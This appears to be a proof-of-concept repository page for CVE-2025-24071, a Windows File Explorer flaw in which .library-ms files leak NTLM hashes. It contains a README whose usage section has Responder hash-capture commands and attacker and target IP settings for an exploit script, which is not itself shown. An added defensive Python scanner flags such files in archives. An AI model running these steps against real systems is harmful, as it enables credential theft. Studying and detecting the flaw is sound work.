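Related vulnerability
Title:
Microsoft Windows File Explorer Information Disclosure Vulnerability
(CVE-2025-24071)
Description: Microsoft Windows File Explorer is a file manager application from Microsoft (USA). Microsoft Windows File Explorer has an information disclosure vulnerability. An attacker can exploit this vulnerability to obtain sensitive information. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Systems, Windows Server 2019, Windows Server
Description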
Python script to execute CVE-2025-24071
Introduction
# CVE-2025-24071: Microsoft Windows File Explorer Spoofing Vulnerability (script by SilentExploit)
## 📖 Description
This project detects and demonstrates exploitation of a **Windows File Explorer spoofing vulnerability**.
The issue arises from a **Windows library file (`.library-ms`)** containing a network path, either as a direct attachment or embedded in an archive.
When opened, the file can cause Windows to **leak NTLM hashes** to a remote (potentially malicious) network location.
POC: https://imgur.com/a/hEO83Se
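A defensive counterpart to the behaviour described above, as an added example (not part of the original README or the script it documents): a gateway-style check that flags `.library-ms` files, sent directly or inside a ZIP, that reference a UNC host outside an allowlist. The function names, the depth and size limits, and the sample hosts are assumptions; only ZIP archives are handled, since that is what Python's standard library reads here.

```python
import io
import re
import zipfile

# \\host\share... ; group 1 is the host Windows would try to reach
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)\\[^\s<>\"\\]+")
MAX_DEPTH = 3            # nested-archive limit (assumed policy value)
MAX_BYTES = 1_000_000    # skip oversized entries (assumed policy value)


def _text(data: bytes) -> str:
    """Decode file bytes: honour a UTF-16 BOM, otherwise treat as UTF-8."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16", errors="replace")
    return data.decode("utf-8", errors="replace")


def scan_attachment(name, data, allowed_hosts=(), depth=0):
    """Return [(path, host)] for each .library-ms naming a UNC host not allowed."""
    findings = []
    if name.lower().endswith(".library-ms"):
        allowed = {h.lower() for h in allowed_hosts}
        hosts = {h.lower() for h in UNC_RE.findall(_text(data))}
        findings += [(name, h) for h in sorted(hosts - allowed)]
    elif depth < MAX_DEPTH and zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir() or info.file_size > MAX_BYTES:
                    continue
                findings += scan_attachment(f"{name}!{info.filename}",
                                            zf.read(info), allowed_hosts, depth + 1)
    return findings


def demo():
    # Constructed sample: a fragment, not a complete library file.
    # 198.51.100.7 is a documentation address; fs01.corp.example is hypothetical.
    frag = b"<url>\\\\198.51.100.7\\share</url>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/Q3.library-ms", frag)
        zf.writestr("docs/readme.txt", b"nothing to see")
    return scan_attachment("invoice.zip", buf.getvalue(), ["fs01.corp.example"])


if __name__ == "__main__":
    print(demo())
```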
---
## ⚡ Usage
### 1. Start Responder
On your attacking machine, run Responder to capture NTLM hashes:
```bash
sudo responder -I tun0 -wvF
```
### 2. Run the Script
You can configure the script in two ways:
✅ Option A: Edit defaults (easiest)
Modify the default parameters in the script directly.
```python
import argparse

def parse_args():  # enclosing function name assumed; the README shows only its body
    parser = argparse.ArgumentParser()
    parser.add_argument("--attacker-ip", default="10.10.14.14", help="Attacker's IP")  # your IP
    parser.add_argument("--target-ip", default="10.129.232.88", help="Target's IP")  # target IP
    parser.add_argument("--share-name", default="IT", help="SMB share name")  # name of the share you have access to, without the /
    parser.add_argument("--username", default="USERNAME", help="SMB username")  # username of the share owner
    parser.add_argument("--password", default="PASSWORD", help="SMB password")  # password of the share owner
    parser.add_argument("--interface", default="tun0", help="Responder network interface")  # check ifconfig; tun0 will work if you're on a VPN
    return parser.parse_args()
```
✅ Option B: Run with CLI parameters
Execute with arguments:
```bash
python3 CVE-2025-24071.py \
--attacker-ip <ATTACKER_IP> \
--target-ip <TARGET_IP> \
--share-name <SHARE_NAME> \
--username <USERNAME> \
--password <PASSWORD> \
--interface <INTERFACE>
```
File snapshot
[4.0K] /data/pocs/63392f46dd6c08634b480663ec0b75857d20b938
├── [3.9K] cve-2025-24071-exploit.py
└── [1.9K] README.md
0 directories, 2 files